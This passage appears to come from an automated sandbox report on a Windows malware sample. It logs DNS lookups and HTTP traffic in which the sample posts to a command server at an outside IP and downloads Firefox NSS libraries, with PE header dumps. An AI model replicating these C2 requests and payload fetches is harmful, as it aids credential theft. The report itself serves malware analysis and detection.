                                                                                                                                            Sep 27, 2021 18:32:52.424601078 CEST5507453192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:32:52.443528891 CEST53550748.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:07.412336111 CEST5451353192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:07.425153971 CEST53545138.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:24.084480047 CEST6426753192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:24.149379969 CEST53642678.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:42.253237009 CEST4944853192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:42.291203976 CEST53494488.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:44.223140001 CEST6034253192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:44.299690962 CEST53603428.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:44.969746113 CEST6134653192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:45.048495054 CEST53613468.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:45.487870932 CEST5177453192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:45.570615053 CEST53517748.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:45.902487993 CEST5602353192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:46.005815029 CEST53560238.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:46.214914083 CEST5838453192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:46.242233038 CEST53583848.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:46.593533039 CEST6026153192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:46.658246994 CEST53602618.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:47.338186979 CEST5606153192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:47.424873114 CEST53560618.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:48.001725912 CEST5833653192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:48.015306950 CEST53583368.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:48.616951942 CEST5378153192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:48.679975986 CEST53537818.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:49.496711016 CEST5406453192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:49.509562016 CEST53540648.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:49.921266079 CEST5281153192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:50.000016928 CEST53528118.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:59.833268881 CEST5529953192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:59.840692043 CEST6374553192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:33:59.867470026 CEST53552998.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:33:59.878201962 CEST53637458.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:34:03.491660118 CEST5005553192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:34:03.510817051 CEST53500558.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:34:19.840560913 CEST6137453192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:34:19.912019968 CEST53613748.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:34:34.511234045 CEST5033953192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:34:34.543468952 CEST53503398.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:34:35.694257021 CEST6330753192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:34:35.722311974 CEST53633078.8.8.8192.168.2.6
                                                                                                                                            Sep 27, 2021 18:35:07.624861002 CEST4969453192.168.2.68.8.8.8
                                                                                                                                            Sep 27, 2021 18:35:07.639327049 CEST53496948.8.8.8192.168.2.6

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                            Sep 27, 2021 18:33:07.412336111 CEST192.168.2.68.8.8.80x81f3Standard query (0)mas.toA (IP address)IN (0x0001)

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                            Sep 27, 2021 18:33:07.425153971 CEST8.8.8.8192.168.2.60x81f3No error (0)mas.to88.99.75.82A (IP address)IN (0x0001)

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • mas.to
                                                                                                                                            • 23.88.105.196

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.64974088.99.75.82443C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            1192.168.2.64974123.88.105.19680C:\Users\user\Desktop\T6zZFfRLqs.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Sep 27, 2021 18:33:08.238046885 CEST966OUTPOST /1008 HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                            Content-Length: 25
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                                                                                            Data Ascii: --1BEF0A57BE110FD467A--
                                                                                                                                            Sep 27, 2021 18:33:08.345690012 CEST967INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:08 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Encoding: gzip
                                                                                                                                            Data Raw: 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 8c b1 0a 83 30 10 86 9f c6 25 48 50 8b 4b 32 d6 4e 1d 2c d4 6e 5d ae 31 5a 31 21 21 b9 ab f5 ed 2b c9 58 0e fe ef 3b f8 ef ea b2 fe 9b a6 ad ca 4e 4f 40 06 65 d1 5d ee d7 a1 bf 15 4f c9 38 7e 51 30 3e c2 91 1b 18 a3 91 71 26 58 33 41 e2 0b d4 4a 3e a9 72 a3 4e e2 21 c6 cd 85 31 2d 40 f8 4e 32 3b 37 9b 5c 20 54 89 8f e1 9c 2f c3 ee f3 db 55 ef 07 65 5b 49 0c a4 a5 75 9f 45 47 61 29 2e 4a 58 7f 92 3f 78 84 d6 b9 ba 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 99e0%HPK2N,n]1Z1!!+X;NO@e]O8~Q0>q&X3AJ>rN!1-@N2;7\ T/Ue[IuEGa).JX?x0
                                                                                                                                            Sep 27, 2021 18:33:08.349280119 CEST967OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:08.370640993 CEST969INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:08 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 334288
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "519d0-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:08 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
                                                                                                                                            Sep 27, 2021 18:33:08.642503977 CEST1319OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:08.663970947 CEST1321INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:08 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 137168
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "217d0-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:08 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
                                                                                                                                            Sep 27, 2021 18:33:08.769380093 CEST1465OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:08.790802002 CEST1466INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:08 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 440120
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "6b738-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:08 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
                                                                                                                                            Sep 27, 2021 18:33:09.061364889 CEST1920OUTGET /nss3.dll HTTP/1.1
                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                            Host: 23.88.105.196
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Sep 27, 2021 18:33:09.082881927 CEST1922INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Mon, 27 Sep 2021 16:33:09 GMT
                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                            Content-Length: 1246160
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                            ETag: "1303d0-57aa1f0b0df80"
                                                                                                                                            Expires: Tue, 28 Sep 2021 16:33:09 GMT
                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                            X-Cache-Status: EXPIRED
                                                                                                                                            X-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 